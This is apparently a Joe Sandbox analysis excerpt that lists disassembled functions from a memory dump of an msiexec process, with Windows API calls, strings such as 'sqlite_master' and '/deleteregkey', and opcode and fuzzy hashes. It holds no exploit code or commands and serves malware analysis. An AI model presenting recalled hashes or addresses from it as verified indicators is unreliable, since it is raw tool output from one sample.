                                                                                                    • Opcode ID: d2168fc35a9e51fc0f08b31e90096d62166f6d3a6d6a12b6b3cc3b12d0dfdf47
                                                                                                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                    • Opcode Fuzzy Hash: d2168fc35a9e51fc0f08b31e90096d62166f6d3a6d6a12b6b3cc3b12d0dfdf47
                                                                                                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004144E7
                                                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                    • memset.MSVCRT ref: 0041451A
                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 1127616056-0
                                                                                                    • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                    • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                    • memset.MSVCRT ref: 0042FED3
                                                                                                    • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: sqlite_master
                                                                                                    • API String ID: 438689982-3163232059
                                                                                                    • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                    • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                    APIs
                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3917621476-0
                                                                                                    • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                    • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                                                                    • wcscat.MSVCRT ref: 0041101F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 822687973-0
                                                                                                    • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                    • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                    APIs
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                                    • malloc.MSVCRT ref: 00417459
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                                                                                                    • free.MSVCRT ref: 0041747F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2605342592-0
                                                                                                    • Opcode ID: 99952dbbdb1bfba8fd85830a5d685bc4282b7af98e1c6427db74e5cbed68ad45
                                                                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                    • Opcode Fuzzy Hash: 99952dbbdb1bfba8fd85830a5d685bc4282b7af98e1c6427db74e5cbed68ad45
                                                                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                    • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2678498856-0
                                                                                                    • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                    • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Item
                                                                                                    • String ID:
                                                                                                    • API String ID: 3888421826-0
                                                                                                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00417B7B
                                                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                    • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3727323765-0
                                                                                                    • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                    • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F673
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                                                    • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2754987064-0
                                                                                                    • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                    • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2754987064-0
                                                                                                    • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                    • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00402FD7
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                    • strlen.MSVCRT ref: 00403006
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2754987064-0
                                                                                                    • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                    • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscpy$CloseHandle
                                                                                                    • String ID: General
                                                                                                    • API String ID: 3722638380-26480598
                                                                                                    • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                    • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                    • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                    • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                    APIs
                                                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 764393265-0
                                                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                    APIs
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$System$File$LocalSpecific
                                                                                                    • String ID:
                                                                                                    • API String ID: 979780441-0
                                                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
APIs
• memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
• memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
• GetModuleHandleW.KERNEL32(00000000), ref: 00413505
• DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
Memory Dump Source
• Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$DialogHandleModuleParam
• String ID:
• API String ID: 1386444988-0
APIs
• ??3@YAXPAX@Z.MSVCRT(046E0048), ref: 0044DF01
• ??3@YAXPAX@Z.MSVCRT(02E37548), ref: 0044DF11
• ??3@YAXPAX@Z.MSVCRT(02E37D58), ref: 0044DF21
• ??3@YAXPAX@Z.MSVCRT(02E37950), ref: 0044DF31
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
APIs
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
• InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
Similarity
• API ID: InvalidateMessageRectSend
• String ID: d=E
• API String ID: 909852535-3703654223
APIs
• wcschr.MSVCRT ref: 0040F79E
• wcschr.MSVCRT ref: 0040F7AC
  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
Similarity
• API ID: wcschr$memcpywcslen
• String ID: "
• API String ID: 1983396471-123907689
APIs
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• _memicmp.MSVCRT ref: 0040C00D
• memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
Similarity
• API ID: FilePointer_memicmpmemcpy
• String ID: URL
• API String ID: 2108176848-3574463123
APIs
• _snwprintf.MSVCRT ref: 0040A398
• memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
Similarity
• API ID: _snwprintfmemcpy
• String ID: %2.2X
• API String ID: 2789212964-323797159
Similarity
• API ID: _snwprintf
• String ID: %%-%d.%ds
• API String ID: 3988819677-2008345750
APIs
• GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
• memset.MSVCRT ref: 00401917
Similarity
• API ID: PlacementWindowmemset
• String ID: WinPos
• API String ID: 4036792311-2823255486
APIs
• ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
• DeleteObject.GDI32(00000000), ref: 004125E7
Similarity
• API ID: ??3@DeleteObject
• String ID: r!A
• API String ID: 1103273653-628097481
APIs
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
• wcsrchr.MSVCRT ref: 0040DCE9
• wcscat.MSVCRT ref: 0040DCFF
Similarity
• API ID: FileModuleNamewcscatwcsrchr
• String ID: _lng.ini
• API String ID: 383090722-1948609170
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                    • API String ID: 2773794195-880857682
                                                                                                    • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                    • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
